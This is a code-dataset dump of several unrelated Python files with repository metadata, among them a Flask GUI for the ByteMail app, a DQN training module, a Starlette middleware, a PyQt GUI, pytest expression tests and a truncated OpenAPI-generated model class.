    # Renamed the local from `map`, which shadowed the builtin.
    dust_map = sfdmap.SFDMap(__snsim_dir_path__ + '/dust_data')
    ebv = dust_map.ebv(ra, dec, unit='radian')
    return ebv
| 0 | 0 | 0 |
5a81acb80f3e5af524b468d8e34e3dbfea839359 | 67 | py | Python | yun/batch/__init__.py | NbKevin/ArduinoYunAPI | 9f928cb9b7b99c19a2f255c6194f5a3ff7a06732 | [
"Apache-2.0"
] | null | null | null | yun/batch/__init__.py | NbKevin/ArduinoYunAPI | 9f928cb9b7b99c19a2f255c6194f5a3ff7a06732 | [
"Apache-2.0"
] | null | null | null | yun/batch/__init__.py | NbKevin/ArduinoYunAPI | 9f928cb9b7b99c19a2f255c6194f5a3ff7a06732 | [
"Apache-2.0"
] | null | null | null | #!/usr/env/bin python
# -*- encoding: utf-8 -*-
__author__ = 'Nb'
| 13.4 | 25 | 0.58209 | #!/usr/env/bin python
# -*- encoding: utf-8 -*-
__author__ = 'Nb'
| 0 | 0 | 0 |
39c723183c5ba9cbd0b76ee6b6fd2c3a10c44e46 | 4,731 | py | Python | bytemailgui.py | Max00355/ByteMail-1 | 576f765da9fb88f23b4d5c46868e0ce16db83c7c | [
"MIT"
] | 4 | 2016-02-18T15:11:58.000Z | 2020-01-16T11:07:50.000Z | bytemailgui.py | Max00355/ByteMail-1 | 576f765da9fb88f23b4d5c46868e0ce16db83c7c | [
"MIT"
] | 1 | 2021-03-06T00:07:14.000Z | 2021-03-06T00:15:26.000Z | bytemailgui.py | Max00355/ByteMail-1 | 576f765da9fb88f23b4d5c46868e0ce16db83c7c | [
"MIT"
] | 1 | 2017-11-08T04:33:38.000Z | 2017-11-08T04:33:38.000Z | from flask import Flask, redirect, render_template, request
import db
import message
import random
import read
import delete
import addressbook
import sent as sent_
app = Flask(__name__)
@app.route("/", methods=['GET', 'POST'])
@app.route("/sent/", methods=['GET', 'POST'])
@app.route("/read/<id>")
@app.route("/addressbook/", methods=['GET', 'POST'])
@app.route("/reply/<to>/<title>/", methods=['GET', 'POST'])
@app.route("/send/", methods=['GET', 'POST'])
if __name__ == "__main__":
app.run(debug=True, port=5044)
| 31.331126 | 154 | 0.535193 | from flask import Flask, redirect, render_template, request
import db
import message
import random
import read
import delete
import addressbook
import sent as sent_
app = Flask(__name__)
def check():
    """Return all stored messages addressed to this account's address.

    Reads the module-level `addr` global (set by run()).
    """
    # NOTE(review): bare except + continue retries forever if the DB call
    # keeps failing — confirm a bounded retry is not wanted.
    while True:
        try:
            c = db.messages.find("messages", "all")
            break
        except:
            continue
    messages = []
    for x in c:
        if 'to' in x:
            if x['to'] == addr:
                messages.append(x)
    return messages
@app.route("/", methods=['GET', 'POST'])
def index():
if request.method == 'POST':
for x in request.form.getlist("delete"):
delete_(x.replace("/", ''))
message = check()
message.reverse()
return render_template("index.html", messages=message, num=str(len(message)), addr=addr)
def empty_sent(id):
    """Delete a single message from the local sent store."""
    sent_.sent_delete(id)
@app.route("/sent/", methods=['GET', 'POST'])
def sent():
try:
if request.method == 'POST':
for x in request.form.getlist("delete"):
empty_sent(x.replace("/", ''))
c = db.sent.find("sent", "all")
message = []
for x in c:
message.append(x)
message.reverse()
return render_template("sent.html", messages=message, num=str(len(check())), addr=addr)
except:
return "<script>alert('You have not sent any messages yet.');window.location = '/';</script>"
@app.route("/read/<id>")
def read_(id):
data = read.read(id, addr).split("\n")
id = data[2]
time = data[3]
title = data[4]
from_ = data[5]
message = ' '.join(data[7:])
num = check()
to_ = title.split()[1]
title_ = from_.split()[1]
return render_template("read.html", title_=title_, to_=to_, num=str(len(num)), id=id, time=time, from_=from_, message=message, title=title, addr=addr)
@app.route("/addressbook/", methods=['GET', 'POST'])
def addressbook_():
if request.method == "POST":
name = request.form['name']
address = request.form['addr']
addressbook.add_entry(name, address)
delete = request.form.getlist("delete")
if delete:
for x in delete:
address_delete(x)
return redirect("/addressbook/")
try:
addr_ = []
addresses = addressbook.addresses().replace("\t", '').split("\n")
for x in addresses:
try:
if x != '':
x = x.split()
name = x[0]
addre = x[1]
addr_.append({"name":name, "addr":addre})
except IndexError:
continue
addresses = addr_
return render_template("addressbook.html", addresses=addresses, num=str(len(check())), addr=addr)
except Exception, error:
return render_template("addressbook.html", num=str(len(check())), addr=addr)
@app.route("/reply/<to>/<title>/", methods=['GET', 'POST'])
def reply(to, title):
    """Pre-filled compose form; POST sends the reply.

    GET renders the form with `to`/`title` taken from the URL. On POST,
    a recipient that is not a 32-char address is treated as an address-book
    name and resolved via the addresses DB before sending.
    """
    num = check()
    if request.method == 'POST':
        to = request.form['to']
        # NOTE(review): this resolution block is duplicated in send();
        # a shared helper would avoid the two copies drifting apart.
        if len(to) != 32:
            check_ = db.addressdb.find("addresses", "all")
            for x in check_:
                for y in x:
                    if y == to:
                        to = x[y]
        title = request.form['title']
        msg = request.form['message']
        check_ = message.send_msg(msg, title, to, addr)
        check_ = """<script>alert("{0}");window.location = '/';</script>""".format(check_)
        return check_
    return render_template("reply.html", title=title, to=to, addr=addr, num=str(len(num)))
def address_delete(name):
    """Remove the entry called `name` from the address book."""
    addressbook.remove_address(name)
@app.route("/send/", methods=['GET', 'POST'])
def send():
    """Compose form; POST sends the message to every listed recipient.

    Recipients may be a comma-separated list; any entry that is not a
    32-char address is looked up as an address-book name.
    """
    num = check()
    if request.method == 'POST':
        to = request.form['to'].replace(" ", '')
        if "," in to:
            recipients = to.split(",")
        else:
            recipients = [to]
        # Read the message fields once, outside the recipient loop.
        title = request.form['title']
        msg = request.form['message']
        # BUG FIX: the original `return check_` sat inside this loop, so only
        # the FIRST recipient ever received the message. Now every recipient
        # is processed; the alert shows the status of the last send.
        for to in recipients:
            if len(to) != 32:
                # Treat as an address-book name and resolve it.
                for entry in db.addressdb.find("addresses", "all"):
                    for name in entry:
                        if name == to:
                            to = entry[name]
            check_ = message.send_msg(msg, title, to, addr)
        check_ = """<script>alert("{0}");window.location = '/';</script>""".format(check_)
        return check_
    return render_template("send.html", addr=addr, num=str(len(num)))
def delete_(id):
    """Delete inbox message `id` for this node's address."""
    # FIX: the return value was previously bound to a local named `check`,
    # shadowing the module-level check() helper; it was never used.
    delete.send_delete(id, addr)
def run():
    """Entry point used by the launcher: load our own address, start the app."""
    global addr
    # `addr` is this node's own address, read once at startup and used by
    # every route handler above.
    addr = db.data.find("data", "all")[0]['addr']
    app.run(port=5334, debug=False)
if __name__ == "__main__":
    # Dev entry point. NOTE(review): uses port 5044 while run() uses 5334,
    # and skips the `addr` initialisation done in run() -- confirm intended.
    app.run(debug=True, port=5044)
| 3,951 | 0 | 252 |
b331dfbb5fb50ffa7069ef01c5dd5fd6c434574e | 4,413 | py | Python | alexander/dqn/func_q_learning.py | Fiona55/hiv_experiment | de79d5bac3499025e1a7e2d456810490c6ecb4e9 | [
"MIT"
] | null | null | null | alexander/dqn/func_q_learning.py | Fiona55/hiv_experiment | de79d5bac3499025e1a7e2d456810490c6ecb4e9 | [
"MIT"
] | null | null | null | alexander/dqn/func_q_learning.py | Fiona55/hiv_experiment | de79d5bac3499025e1a7e2d456810490c6ecb4e9 | [
"MIT"
] | 3 | 2022-03-14T15:27:46.000Z | 2022-03-22T13:00:44.000Z | import math
from typing import Callable, Tuple
import numpy as np
import torch
import torch.nn as nn
from loguru import logger
from tqdm import tqdm
from alexander.dqn.buffer import ReplayBuffer
from alexander.dqn.hiv_patient import HIVPatient
from alexander.dqn.q_agent import Agent
from dataclasses import dataclass
@dataclass
@dataclass
| 24.653631 | 88 | 0.628144 | import math
from typing import Callable, Tuple
import numpy as np
import torch
import torch.nn as nn
from loguru import logger
from tqdm import tqdm
from alexander.dqn.buffer import ReplayBuffer
from alexander.dqn.hiv_patient import HIVPatient
from alexander.dqn.q_agent import Agent
from dataclasses import dataclass
class DQN(nn.Module):
    """Two-layer MLP mapping an observation vector to per-action Q-values."""

    def __init__(self, obs_size: int, action_size: int, hidden_size: int = 128) -> None:
        super().__init__()
        layers = [
            nn.Linear(obs_size, hidden_size),
            nn.ReLU(),
            nn.Linear(hidden_size, action_size),
        ]
        self.net = nn.Sequential(*layers)

    def forward(self, x):
        # Inputs may arrive as ints/doubles; the linear layers expect float32.
        return self.net(x.float())
@dataclass
class Epsilon:
    """Epsilon-greedy exploration schedule parameters."""
    max: float  # starting (and pre-delay) exploration rate
    min: float  # final exploration rate after annealing
    delay: int  # number of global steps before annealing begins
@dataclass
class QLearningCongfig:
    """Hyper-parameters for DQN training.

    NOTE(review): class name misspells "Config"; kept as-is because it is
    referenced by callers (e.g. train_dqn's signature).
    """
    gamma: float  # discount factor for bootstrapped targets
    batch_size: int  # transitions sampled per gradient step
    learning_rate: float  # Adam step size
    num_episodes: int  # total training episodes
    steps_per_episode: int  # max env steps per episode
    target_update_rate: int  # sync target net every N global steps
def anneal_cos(start, end, pct):
    """Cosine interpolation from ``start`` (pct=0) to ``end`` (pct=1)."""
    # Half-cosine weight: 1.0 at pct=0, 0.0 at pct=1.
    cos_out = math.cos(math.pi * pct) + 1
    return end + (start - end) / 2.0 * cos_out
def anneal_linear(start, end, pct):
    """Linear interpolation from ``start`` (pct=0) to ``end`` (pct=1)."""
    return start + (end - start) * pct
def loss_dqn(
    batch: Tuple[np.array, ...],
    gamma: float,
    loss_fn: Callable,
    policy_net: nn.Module,
    target_net: nn.Module,
) -> torch.Tensor:
    """Compute the TD loss for one minibatch of (s, a, r, done, s') tuples."""
    states, actions, rewards, dones, next_states = batch

    state_t = torch.tensor(states)
    action_t = torch.tensor(actions).unsqueeze(-1)
    reward_t = torch.tensor(rewards)
    next_state_t = torch.tensor(next_states)

    # Q(s, a) for the actions actually taken.
    q_taken = policy_net(state_t).gather(1, action_t).squeeze(-1)

    # Bootstrapped targets come from the frozen target network; terminal
    # transitions contribute no future value.
    with torch.no_grad():
        best_next_q, _ = target_net(next_state_t).max(dim=1)
        best_next_q[dones] = 0.0
        best_next_q = best_next_q.detach()

    target_q = best_next_q * gamma + reward_t
    return loss_fn(q_taken, target_q)
def gradient_step_dqn(
    memory: ReplayBuffer,
    batch_size: int,
    optimizer: torch.optim.Optimizer,
    gamma: float,
    policy_net: nn.Module,
    target_net: nn.Module,
    loss_fn: Callable,
) -> torch.Tensor:
    """Sample one minibatch from `memory` and take a single optimizer step.

    Returns the minibatch loss tensor, or None while the replay buffer
    holds fewer than `batch_size` transitions (callers must handle None).
    """
    if len(memory) < batch_size:
        return

    batch = memory.sample(batch_size)
    loss = loss_dqn(
        batch=batch,
        gamma=gamma,
        loss_fn=loss_fn,
        policy_net=policy_net,
        target_net=target_net,
    )

    # Optimize the model
    optimizer.zero_grad()
    loss.backward()
    # Clamp each parameter's gradient to [-1, 1] (element-wise clipping).
    for param in policy_net.parameters():
        param.grad.data.clamp_(-1, 1)
    optimizer.step()

    return loss
def train_dqn(
    memory: ReplayBuffer,
    agent: Agent,
    policy_net: nn.Module,
    target_net: nn.Module,
    q_conf: QLearningCongfig,
    eps_conf: Epsilon,
):
    """Run the DQN training loop.

    Plays episodes with an epsilon-greedy agent, performing one gradient
    step per environment step and periodically syncing the target network.

    Returns:
        (episode_rewards, losses, epsilons) -- per-episode total rewards,
        per-gradient-step losses, and per-step epsilon values.
    """
    optimizer = torch.optim.Adam(
        params=policy_net.parameters(),
        lr=q_conf.learning_rate,
    )
    loss_fn = nn.SmoothL1Loss()

    episode_rewards = []
    losses = []
    epsilons = []

    global_step = 0
    epsilon = eps_conf.max
    for episode in tqdm(range(q_conf.num_episodes), unit="episode"):
        episode_reward = 0
        # Hold epsilon at its max for the first `delay` steps, then
        # cosine-anneal it over the course of training.
        if global_step > eps_conf.delay:
            epsilon = anneal_cos(
                eps_conf.max,
                eps_conf.min,
                episode / q_conf.num_episodes,
            )
        for _ in range(q_conf.steps_per_episode):
            # Periodically copy the online weights into the target network.
            if global_step % q_conf.target_update_rate == 0:
                target_net.load_state_dict(policy_net.state_dict())

            reward, done = agent.play_step(policy_net, epsilon, memory)
            episode_reward += reward

            loss = gradient_step_dqn(
                memory=memory,
                batch_size=q_conf.batch_size,
                optimizer=optimizer,
                gamma=q_conf.gamma,
                policy_net=policy_net,
                target_net=target_net,
                loss_fn=loss_fn,
            )
            # BUG FIX: gradient_step_dqn returns None until the buffer holds
            # at least `batch_size` transitions (always true at the start of
            # training); the original unconditionally called loss.item() and
            # crashed with AttributeError.
            if loss is not None:
                losses.append(loss.item())
            epsilons.append(epsilon)
            global_step += 1
            if done:
                break
        episode_rewards.append(episode_reward)
    return episode_rewards, losses, epsilons
| 3,647 | 179 | 235 |
f5b0982742c773408ad195e5c023ad2c6967a669 | 426 | py | Python | kami/middleware/pages.py | Nearata/kami | 6d3989de787a54bb896f6cc869cce84aeae7cac5 | [
"Unlicense"
] | null | null | null | kami/middleware/pages.py | Nearata/kami | 6d3989de787a54bb896f6cc869cce84aeae7cac5 | [
"Unlicense"
] | 7 | 2021-02-27T22:25:14.000Z | 2021-03-04T16:41:55.000Z | kami/middleware/pages.py | Nearata/kami | 6d3989de787a54bb896f6cc869cce84aeae7cac5 | [
"Unlicense"
] | null | null | null | from starlette.middleware.base import BaseHTTPMiddleware, RequestResponseEndpoint
from starlette.requests import Request
from starlette.responses import Response
from kami.database import Pages
| 32.769231 | 95 | 0.800469 | from starlette.middleware.base import BaseHTTPMiddleware, RequestResponseEndpoint
from starlette.requests import Request
from starlette.responses import Response
from kami.database import Pages
class PagesMiddleware(BaseHTTPMiddleware):
    """Starlette middleware that refreshes the cached page list per request.

    Before each request is handled, all rows of the Pages table are re-queried
    and stashed on ``request.app.state.pages`` so downstream handlers and
    templates always see current data.
    """
    async def dispatch(self, request: Request, call_next: RequestResponseEndpoint) -> Response:
        # NOTE(review): this hits the database on every request -- fine for
        # small sites; consider caching if the Pages table grows.
        request.app.state.pages = Pages.select()
        return await call_next(request)
| 160 | 21 | 49 |
883d362ff7bd311b837cd50bd2844900ea38d650 | 1,947 | py | Python | src/gui_statistics_calculation.py | ukasofisosaari/hp_tilasto_tyokalu | a70349318cf6346caaa5ec90447770200568b026 | [
"MIT"
] | 1 | 2017-06-08T07:03:46.000Z | 2017-06-08T07:03:46.000Z | src/gui_statistics_calculation.py | ukasofisosaari/hp_tilasto_tyokalu | a70349318cf6346caaa5ec90447770200568b026 | [
"MIT"
] | 4 | 2017-10-07T10:57:11.000Z | 2017-10-07T11:01:43.000Z | src/gui_statistics_calculation.py | ukasofisosaari/kuksa_tilastotyokalu | a70349318cf6346caaa5ec90447770200568b026 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
#-*- coding: utf-8 -*-
""" Module for statistics calculation side of the ui"""
from PyQt5.QtWidgets import QVBoxLayout, QWidget, QLabel, QPushButton, QFileDialog
class GUIStatisticsCalculation(QWidget):
    """ Right side of UI, ie. the statistics calculation settings and parameters."""
    # NOTE(review): this copy has no __init__; it assumes self._main_layout,
    # self.calculate_btn and self._excel_file_name are initialised elsewhere
    # before these methods run -- confirm.
    def calculator_selected(self, calculator_params, calculator_name, calculator_desc):
        """When a calculator has been selected, build the UI for the calculation side."""
        # Clear widgets left over from a previously selected calculator.
        while self._main_layout.count() > 0:
            self._main_layout.itemAt(0).widget().setParent(None)
        title = QLabel(calculator_name)
        self._main_layout.addWidget(title)
        desc = QLabel(calculator_desc)
        self._main_layout.addWidget(desc)
        self._load_file_btn = QPushButton("Lataa excel tiedosto")
        self._load_file_btn.clicked.connect(self._load_file)
        self._main_layout.addWidget(self._load_file_btn)
        self.calculate_btn = QPushButton("Laske tilasto")
        # Disabled until an input file has been chosen in _load_file().
        self.calculate_btn.setEnabled(False)
        self._main_layout.addWidget(self.calculate_btn)
    def _load_file(self):
        """Method that is called when load file button is pushed"""
        self._excel_file_name = QFileDialog.getOpenFileName()[0]
        print(self._excel_file_name)
        filename = QLabel(self._excel_file_name)
        self._main_layout.addWidget(filename)
        self.calculate_btn.setEnabled(True)
    def get_excel_file(self):
        """ Method for returning selected excel"""
        return self._excel_file_name
| 38.176471 | 99 | 0.694915 | #!/usr/bin/env python3
#-*- coding: utf-8 -*-
""" Module for statistics calculation side of the ui"""
from PyQt5.QtWidgets import QVBoxLayout, QWidget, QLabel, QPushButton, QFileDialog
class GUIStatisticsCalculation(QWidget):
    """Right side of UI, i.e. the statistics calculation settings and parameters."""

    def __init__(self, parent=None):
        QWidget.__init__(self, parent)
        self._main_layout = QVBoxLayout()
        self._label = QLabel("Valitse tilastolaskin")
        self._main_layout.addWidget(self._label)
        self.setLayout(self._main_layout)
        # Created lazily in calculator_selected().
        self._load_file_btn = None
        self.calculate_btn = None
        self._excel_file_name = ""

    def calculator_selected(self, calculator_params, calculator_name, calculator_desc):
        """When a calculator has been selected, build the UI for the calculation side."""
        # Clear widgets left over from a previously selected calculator.
        while self._main_layout.count() > 0:
            self._main_layout.itemAt(0).widget().setParent(None)
        title = QLabel(calculator_name)
        self._main_layout.addWidget(title)
        desc = QLabel(calculator_desc)
        self._main_layout.addWidget(desc)
        self._load_file_btn = QPushButton("Lataa excel tiedosto")
        self._load_file_btn.clicked.connect(self._load_file)
        self._main_layout.addWidget(self._load_file_btn)
        self.calculate_btn = QPushButton("Laske tilasto")
        # Disabled until an input file has been chosen in _load_file().
        self.calculate_btn.setEnabled(False)
        self._main_layout.addWidget(self.calculate_btn)

    def _load_file(self):
        """Method that is called when the load-file button is pushed."""
        selected = QFileDialog.getOpenFileName()[0]
        # BUG FIX: the dialog returns '' when cancelled; the original still
        # displayed the empty name and enabled the Calculate button.
        # (Also removed a leftover debug print of the chosen path.)
        if not selected:
            return
        self._excel_file_name = selected
        filename = QLabel(self._excel_file_name)
        self._main_layout.addWidget(filename)
        self.calculate_btn.setEnabled(True)

    def get_excel_file(self):
        """Return the path of the selected excel file ('' if none chosen)."""
        return self._excel_file_name
| 342 | 0 | 26 |
e840581a87d65f87fdd176a53421dd03dd43e00f | 4,472 | py | Python | tests/test_expressions.py | bundocka/fast-carpenter | fa90ba6fb28a73c5de4be53daebc7af9889f2478 | [
"Apache-2.0"
] | null | null | null | tests/test_expressions.py | bundocka/fast-carpenter | fa90ba6fb28a73c5de4be53daebc7af9889f2478 | [
"Apache-2.0"
] | null | null | null | tests/test_expressions.py | bundocka/fast-carpenter | fa90ba6fb28a73c5de4be53daebc7af9889f2478 | [
"Apache-2.0"
] | null | null | null | import pytest
import numpy as np
from awkward import JaggedArray
from fast_carpenter import expressions
@pytest.mark.parametrize('input, expected', [
("Muon.Px > 30", ("Muon__DOT__Px > 30", {'Muon__DOT__Px': 'Muon.Px'})),
("events.Muon.Px > 30", ("events__DOT__Muon__DOT__Px > 30",
{'events__DOT__Muon__DOT__Px': 'events.Muon.Px'})),
('l1CaloTowerTree.L1CaloTowerTree.L1CaloTower.et > 50',
('l1CaloTowerTree__DOT__L1CaloTowerTree__DOT__L1CaloTower__DOT__et > 50',
{'l1CaloTowerTree__DOT__L1CaloTowerTree__DOT__L1CaloTower__DOT__et':
'l1CaloTowerTree.L1CaloTowerTree.L1CaloTower.et'}))
])
| 38.222222 | 86 | 0.679785 | import pytest
import numpy as np
from awkward import JaggedArray
from fast_carpenter import expressions
def test_get_branches(infile):
    """get_branches returns only cut variables that exist in the input tree."""
    valid = infile.allkeys()
    cut = "NMuon > 1"
    branches = expressions.get_branches(cut, valid)
    assert branches == ["NMuon"]
    cut = "NMuon_not_found > 1 and NElectron > 3"
    # Unknown names are silently dropped rather than raising.
    branches = expressions.get_branches(cut, valid)
    assert branches == ["NElectron"]
assert branches == ["NElectron"]
def test_evaluate(wrapped_tree):
    """evaluate() builds a jagged muon-pT array aligned with the input branches."""
    Muon_py, Muon_pz = wrapped_tree.arrays(["Muon_Py", "Muon_Pz"], outputtype=tuple)
    mu_pt = expressions.evaluate(wrapped_tree, "sqrt(Muon_Px**2 + Muon_Py**2)")
    assert len(mu_pt) == 100
    # Per-event multiplicities must match the source branch.
    assert all(mu_pt.counts == Muon_py.counts)
def test_evaulate_matches_array(wrapped_tree):
    """An evaluated cut equals the same cut applied to the raw array.

    NOTE(review): 'evaulate' typo is in the test name; renaming would change
    the collected test id, so it is only flagged here.
    """
    mu_px_array = wrapped_tree.array("Muon_Px") < 0.3
    mu_px_evalu = expressions.evaluate(wrapped_tree, "Muon_Px < 0.3")
    assert (mu_px_evalu == mu_px_array).all().all()
def test_evaluate_bool(full_wrapped_tree):
    """Boolean cuts combine with &/| across event- and object-level arrays."""
    all_true = expressions.evaluate(full_wrapped_tree, "Muon_Px == Muon_Px")
    assert all(all_true.all())
    mu_cut = expressions.evaluate(full_wrapped_tree, "NMuon > 1")
    ele_cut = expressions.evaluate(full_wrapped_tree, "NElectron > 1")
    jet_cut = expressions.evaluate(full_wrapped_tree, "NJet > 1")
    mu_px = expressions.evaluate(full_wrapped_tree, "Muon_Px > 0.3")
    # pad(2)[:, 1] selects the second muon per event (None where absent).
    mu_px = mu_px.pad(2)[:, 1]
    combined = mu_cut & (ele_cut | jet_cut) & mu_px
    # Expected count of 2 is specific to the test input file.
    assert np.count_nonzero(combined) == 2
def test_evaluate_dot(wrapped_tree):
    """Variables whose names contain dots can be referenced in expressions."""
    wrapped_tree.new_variable("Muon.Px", wrapped_tree.array("Muon_Px"))
    all_true = expressions.evaluate(wrapped_tree, "Muon.Px == Muon_Px")
    assert all(all_true.all())
def test_constants(infile):
    """The constants nan/inf are usable inside evaluated expressions."""
    nan_1_or_fewer_mu = expressions.evaluate(infile, "where(NMuon > 1, NMuon, nan)")
    # 289 events with NMuon > 1 is specific to the test input file.
    assert np.count_nonzero(~np.isnan(nan_1_or_fewer_mu)) == 289
    ninf_1_or_fewer_mu = expressions.evaluate(infile, "where(NMuon > 1, NMuon, -inf)")
    assert np.count_nonzero(np.isfinite(ninf_1_or_fewer_mu)) == 289
def test_3D_jagged(wrapped_tree):
    """Doubly-jagged arrays survive aliasing and element-wise arithmetic."""
    fake_3d = [[np.arange(i + 1) + j
                for i in range(j % 3)]
               for j in range(len(wrapped_tree))]
    fake_3d = JaggedArray.fromiter(fake_3d)
    wrapped_tree.new_variable("Fake3D", fake_3d)
    assert isinstance(fake_3d.count(), JaggedArray)
    assert all((fake_3d.copy().count() == fake_3d.count()).all())

    # Plain aliasing returns the stored array unchanged.
    aliased = expressions.evaluate(wrapped_tree, "Fake3D")
    assert (aliased == fake_3d).all().all().all()

    # Scalar multiplication.
    doubled = expressions.evaluate(wrapped_tree, "Fake3D * 2")
    assert (doubled == fake_3d * 2).all().all().all()
    assert len(doubled[0, :, :]) == 0
    assert doubled[1, 0, :] == [2]
    assert doubled[2, 0, :] == [4]
    assert all(doubled[2, 1, :] == [4, 6])

    # Element-wise addition of an array with itself gives the same result.
    doubled = expressions.evaluate(wrapped_tree, "Fake3D + Fake3D")
    assert (doubled == fake_3d * 2).all().all().all()
    assert len(doubled[0, :, :]) == 0
    assert doubled[1, 0, :] == [2]
    assert doubled[2, 0, :] == [4]
    assert all(doubled[2, 1, :] == [4, 6])

    # Arrays with incompatible inner structure cannot be combined.
    fake_3d_2 = [[np.arange(i + 3) + j
                  for i in range(j % 2)]
                 for j in range(len(wrapped_tree))]
    fake_3d_2 = JaggedArray.fromiter(fake_3d_2)
    wrapped_tree.new_variable("SecondFake3D", fake_3d_2)
    with pytest.raises(ValueError) as e:
        expressions.evaluate(wrapped_tree, "SecondFake3D + Fake3D")
    # BUG FIX: `str(e)` stringifies the ExceptionInfo wrapper (a file/line
    # repr in modern pytest), not the exception message; use `e.value`.
    assert "Cannot broadcast" in str(e.value)
@pytest.mark.parametrize('input, expected', [
    ("Muon.Px > 30", ("Muon__DOT__Px > 30", {'Muon__DOT__Px': 'Muon.Px'})),
    ("events.Muon.Px > 30", ("events__DOT__Muon__DOT__Px > 30",
                             {'events__DOT__Muon__DOT__Px': 'events.Muon.Px'})),
    ('l1CaloTowerTree.L1CaloTowerTree.L1CaloTower.et > 50',
     ('l1CaloTowerTree__DOT__L1CaloTowerTree__DOT__L1CaloTower__DOT__et > 50',
      {'l1CaloTowerTree__DOT__L1CaloTowerTree__DOT__L1CaloTower__DOT__et':
       'l1CaloTowerTree.L1CaloTowerTree.L1CaloTower.et'}))
])
def test_preprocess_expression(input, expected):
    """Dotted names are mangled to __DOT__ identifiers plus an alias map."""
    # note: maybe hypothesis.strategies.from_regex is better than parametrize
    clean_expr, alias_dict = expressions.preprocess_expression(input)
    assert clean_expr == expected[0]
    assert alias_dict == expected[1]
def test_broadcast(wrapped_tree):
    """Event-level scalars broadcast against jagged arrays; mismatched jagged
    arrays (different per-event counts) raise ValueError."""
    expressions.evaluate(wrapped_tree, "NJet * Jet_Py + NElectron * Jet_Px")
    with pytest.raises(ValueError):
        expressions.evaluate(wrapped_tree, "Jet_Py + Muon_Px")
| 3,597 | 0 | 206 |
2caecc06a26095213805a7eb2eeab68c1980239d | 1,001 | py | Python | syne_tune/__init__.py | hfurkanbozkurt/syne-tune | 05ee2668f0155b40c3ee3b61e4b3d58f3f9f3c4f | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | syne_tune/__init__.py | hfurkanbozkurt/syne-tune | 05ee2668f0155b40c3ee3b61e4b3d58f3f9f3c4f | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | syne_tune/__init__.py | hfurkanbozkurt/syne-tune | 05ee2668f0155b40c3ee3b61e4b3d58f3f9f3c4f | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # Copyright 2021 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
try:
__all__ = ['StoppingCriterion', 'Tuner', 'Reporter']
from pathlib import Path
from syne_tune.stopping_criterion import StoppingCriterion
from syne_tune.report import Reporter
from syne_tune.tuner import Tuner
except ImportError:
pass
__version__ = read_version()
| 33.366667 | 75 | 0.73027 | # Copyright 2021 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
# Best-effort import of the public API: if optional dependencies are missing
# (e.g. during a partial install), swallow the ImportError so that the module
# -- and the __version__ lookup below -- remains importable.
try:
    __all__ = ['StoppingCriterion', 'Tuner', 'Reporter']
    from pathlib import Path
    from syne_tune.stopping_criterion import StoppingCriterion
    from syne_tune.report import Reporter
    from syne_tune.tuner import Tuner
except ImportError:
    # NOTE(review): deliberately silent -- confirm hiding missing
    # dependencies (rather than surfacing them) is intended.
    pass
def read_version():
    """Return the package version stored in version.py (first line, unquoted)."""
    with open(Path(__file__).parent / "version.py", "r") as f:
        # FIX: strip() guards against a trailing newline (or surrounding
        # whitespace) leaking into the returned version string.
        return f.readline().strip().replace("\"", "")
__version__ = read_version()
| 107 | 0 | 23 |
0a647ce0725e038910f5e586bc9cad57b2a1591d | 23,153 | py | Python | clients/python-flask/generated/openapi_server/models/free_style_project.py | cliffano/jenkins-api-clients-generator | 522d02b3a130a29471df5ec1d3d22c822b3d0813 | [
"MIT"
] | null | null | null | clients/python-flask/generated/openapi_server/models/free_style_project.py | cliffano/jenkins-api-clients-generator | 522d02b3a130a29471df5ec1d3d22c822b3d0813 | [
"MIT"
] | null | null | null | clients/python-flask/generated/openapi_server/models/free_style_project.py | cliffano/jenkins-api-clients-generator | 522d02b3a130a29471df5ec1d3d22c822b3d0813 | [
"MIT"
] | null | null | null | # coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from openapi_server.models.base_model_ import Model
from openapi_server.models.free_style_build import FreeStyleBuild
from openapi_server.models.free_style_projectactions import FreeStyleProjectactions
from openapi_server.models.free_style_projecthealth_report import FreeStyleProjecthealthReport
from openapi_server.models.null_scm import NullSCM
from openapi_server import util
from openapi_server.models.free_style_build import FreeStyleBuild # noqa: E501
from openapi_server.models.free_style_projectactions import FreeStyleProjectactions # noqa: E501
from openapi_server.models.free_style_projecthealth_report import FreeStyleProjecthealthReport # noqa: E501
from openapi_server.models.null_scm import NullSCM # noqa: E501
class FreeStyleProject(Model):
"""NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
Do not edit the class manually.
"""
def __init__(self, _class=None, name=None, url=None, color=None, actions=None, description=None, display_name=None, display_name_or_null=None, full_display_name=None, full_name=None, buildable=None, builds=None, first_build=None, health_report=None, in_queue=None, keep_dependencies=None, last_build=None, last_completed_build=None, last_failed_build=None, last_stable_build=None, last_successful_build=None, last_unstable_build=None, last_unsuccessful_build=None, next_build_number=None, queue_item=None, concurrent_build=None, scm=None): # noqa: E501
"""FreeStyleProject - a model defined in OpenAPI
:param _class: The _class of this FreeStyleProject. # noqa: E501
:type _class: str
:param name: The name of this FreeStyleProject. # noqa: E501
:type name: str
:param url: The url of this FreeStyleProject. # noqa: E501
:type url: str
:param color: The color of this FreeStyleProject. # noqa: E501
:type color: str
:param actions: The actions of this FreeStyleProject. # noqa: E501
:type actions: List[FreeStyleProjectactions]
:param description: The description of this FreeStyleProject. # noqa: E501
:type description: str
:param display_name: The display_name of this FreeStyleProject. # noqa: E501
:type display_name: str
:param display_name_or_null: The display_name_or_null of this FreeStyleProject. # noqa: E501
:type display_name_or_null: str
